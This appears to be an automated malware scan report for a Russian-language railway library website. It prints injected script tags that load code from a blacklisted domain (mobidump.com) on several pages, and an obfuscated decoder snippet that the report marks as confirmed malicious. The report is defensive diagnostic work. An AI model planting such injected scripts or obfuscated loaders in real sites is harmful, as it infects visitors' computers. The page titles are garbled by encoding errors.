Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=railroad.at.ua
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://railroad.at.ua/ | 200 OK Content-Length: 66244 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: mobidump.com ...[1121 bytes skipped]... H^U!e0Rgoo"></iframe><div><script type="text/javascript">new Image().src = "http://counter.yadro.ru/hit;ucoznet?r"+escape(document.referrer)+((typeof(screen)=="undefined")?"":";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+";"+Math.random();</script></div><HTML><script language='javascript' type='text/javascript' src='http://mobidump.com/7h4p5qn4pwc3ofqwg1w'></script><script language='javascript' type='text/javascript' src='http://mobidump.com/78tdia64wf06625gnnlvyr5mcqzmftaffpd81rw6ji'></script><HEAD><TITLE>ÐиблиоÑека Ðелезной ÐоÑоги - ÐÐ»Ð°Ð²Ð½Ð°Ñ ÑÑÑаниÑа</TITLE> <META content="text/html; charset=UTF-8" http-equiv=content-type><LINK rel=StyleSheet type=text/css href="/_st/my.css"> <META name=GENERATOR content="MSHTML 8 ...[2679 bytes skipped]... | ||
http://mobidump.com/7h4p5qn4pwc3ofqwg1w | 200 OK Content-Length: 8665 Content-Type: text/javascript | clean |
http://mobidump.com/78tdia64wf06625gnnlvyr5mcqzmftaffpd81rw6ji | 200 OK Content-Length: 8665 Content-Type: text/javascript | clean |
http://s104.ucoz.net/src/jquery-1.7.2.js | 200 OK Content-Length: 94840 Content-Type: text/javascript | clean |
http://s104.ucoz.net/src/ulightbox/ulightbox.js | 200 OK Content-Length: 22097 Content-Type: text/javascript | clean |
http://s104.ucoz.net/src/uwnd.js?2 | 200 OK Content-Length: 228554 Content-Type: text/javascript | clean |
http://railroad.at.ua/news/rss/ | 200 OK Content-Length: 48885 Content-Type: text/xml | clean |
http://railroad.at.ua/test404page.js | 404 Not Found Content-Length: 6869 Content-Type: text/html | clean |
http://railroad.at.ua/register | 200 OK Content-Length: 33935 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: mobidump.com ...[1121 bytes skipped]... zzLQ1LRUoo"></iframe><div><script type="text/javascript">new Image().src = "http://counter.yadro.ru/hit;ucoznet?r"+escape(document.referrer)+((typeof(screen)=="undefined")?"":";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+";"+Math.random();</script></div><HTML><script language='javascript' type='text/javascript' src='http://mobidump.com/7h4p5qn4pwc3ofqwg1w'></script><script language='javascript' type='text/javascript' src='http://mobidump.com/78tdia64wf06625gnnlvyr5mcqzmftaffpd81rw6ji'></script> <HEAD><TITLE>СÑÑаниÑа ÑегиÑÑÑаÑии - ÐиблиоÑека Ðелезной ÐоÑоги</TITLE> <META content="text/html; charset=UTF-8" http-equiv=content-type><LINK rel=StyleSheet type=text/css href="/_st/my.css"> <META name=GENERATOR cont ...[2537 bytes skipped]... | ||
http://railroad.at.ua/index/0-2 | 200 OK Content-Length: 30605 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: mobidump.com ...[1117 bytes skipped]... q2Txh5fgoo"></iframe><div><script type="text/javascript">new Image().src = "http://counter.yadro.ru/hit;ucoznet?r"+escape(document.referrer)+((typeof(screen)=="undefined")?"":";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+";"+Math.random();</script></div><HTML><script language='javascript' type='text/javascript' src='http://mobidump.com/7h4p5qn4pwc3ofqwg1w'></script><script language='javascript' type='text/javascript' src='http://mobidump.com/78tdia64wf06625gnnlvyr5mcqzmftaffpd81rw6ji'></script> <HEAD><TITLE>ÐиблиоÑека Ðелезной ÐоÑоги - ÐнÑоÑмаÑÐ¸Ñ Ð¾ ÑайÑе</title> <link type="text/css" rel="StyleSheet" href="http://s104.ucoz.net/src/base.css" /> <link type="text/css" rel="StyleSheet" href="http://s104.ucoz.net/src/lay ...[2705 bytes skipped]... | ||
http://railroad.at.ua/publ | HTTP/1.1 301 Moved Permanently Cache-Control: private Connection: close Date: Mon, 26 Jan 2015 02:55:35 GMT Location: http://railroad.at.ua/publ/ Server: uServ/3.2.2 Content-Type: application/octet-stream Set-Cookie: 2railroaduCoz=; path=/; expires=Sat, 26-Jan-2013 02:55:35 GMT; domain=.railroad.at.ua; | clean |
http://railroad.at.ua/publ/ | 200 OK Content-Length: 73266 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: mobidump.com ...[1111 bytes skipped]... LLtNtGtfEo"></iframe><div><script type="text/javascript">new Image().src = "http://counter.yadro.ru/hit;ucoznet?r"+escape(document.referrer)+((typeof(screen)=="undefined")?"":";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+";"+Math.random();</script></div><HTML><script language='javascript' type='text/javascript' src='http://mobidump.com/7h4p5qn4pwc3ofqwg1w'></script><script language='javascript' type='text/javascript' src='http://mobidump.com/78tdia64wf06625gnnlvyr5mcqzmftaffpd81rw6ji'></script> <HEAD><TITLE>ÐаÑалог ÑÑаÑей - ÐиблиоÑека Ðелезной ÐоÑоги</TITLE> <META content="text/html; charset=UTF-8" http-equiv=content-type><LINK rel=StyleSheet type=text/css href="/_st/my.css"> <META name=GENERATOR content="MSHTML ...[2579 bytes skipped]... | ||
http://railroad.at.ua/publ/rss/ | 200 OK Content-Length: 31177 Content-Type: text/xml | clean |
http://railroad.at.ua/forum | 200 OK Content-Length: 19291 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: mobidump.com ...[1127 bytes skipped]... FvdLkNE8vh"></iframe><div><script type="text/javascript">new Image().src = "http://counter.yadro.ru/hit;ucoznet?r"+escape(document.referrer)+((typeof(screen)=="undefined")?"":";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+";"+Math.random();</script></div><HTML><script language='javascript' type='text/javascript' src='http://mobidump.com/7h4p5qn4pwc3ofqwg1w'></script><script language='javascript' type='text/javascript' src='http://mobidump.com/78tdia64wf06625gnnlvyr5mcqzmftaffpd81rw6ji'></script> <HEAD><TITLE>ФоÑÑм</TITLE> <META content="text/html; charset=UTF-8" http-equiv=content-type><LINK rel=StyleSheet type=text/css href="/_st/my.css"> <META name=GENERATOR content="MSHTML 8.00.7601.17537"><link type="text/css" rel="StyleSheet" href="ht ...[2578 bytes skipped]... | ||
http://railroad.at.ua/forum/0-0-0-37 | 200 OK Content-Length: 5256 Content-Type: text/xml | clean |
http://railroad.at.ua/gb | 200 OK Content-Length: 50258 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _y8M=''; function _dS(s){ var i;var r=""; var l=s.length-1; var k=s.substr(l,1); for (i=0;i<l;i++){ c=s.charCodeAt(i)-k; if(c<32){ c=127-(32-c);} r+=String.fromCharCode(c); } return r;} _y8M=_dS('@mrtyx$x}tiA&lmhhir&$reqiA&wsw&$zepyiA&54654<<=94&$3B4'); Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: railroad.at.ua
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Cache-Control: no-store
Cache-Control: private
Connection: close
Date: Mon, 26 Jan 2015 02:55:26 GMT
Pragma: no-cache
Server: uServ/3.2.2
Content-Type: text/html; charset=UTF-8
Set-Cookie: 2railroaduCoz=; path=/; expires=Sat, 26-Jan-2013 02:55:26 GMT; domain=.railroad.at.ua;
Set-Cookie: 2railroaduzll=1422240926; path=/; expires=Tue, 26-Jan-2016 02:55:26 GMT; domain=.railroad.at.ua;
Set-Cookie: 2railroaduCoz=; path=/; expires=Sat, 26-Jan-2013 02:55:26 GMT; domain=.railroad.at.ua;
GET / HTTP/1.1
Host: railroad.at.ua
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Cache-Control: no-store
Cache-Control: private
Connection: close
Date: Mon, 26 Jan 2015 02:55:26 GMT
Pragma: no-cache
Server: uServ/3.2.2
Content-Type: text/html; charset=UTF-8
Set-Cookie: 2railroaduCoz=; path=/; expires=Sat, 26-Jan-2013 02:55:26 GMT; domain=.railroad.at.ua;
Set-Cookie: 2railroaduzll=1422240926; path=/; expires=Tue, 26-Jan-2016 02:55:26 GMT; domain=.railroad.at.ua;
Set-Cookie: 2railroaduCoz=; path=/; expires=Sat, 26-Jan-2013 02:55:26 GMT; domain=.railroad.at.ua;
Second query (visit from search engine):
GET / HTTP/1.1
Host: railroad.at.ua
Referer: http://www.google.com/search?q=railroad.at.ua
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: railroad.at.ua
Referer: http://www.google.com/search?q=railroad.at.ua
Result:
The result is similar to the first query. There are no suspicious redirects found.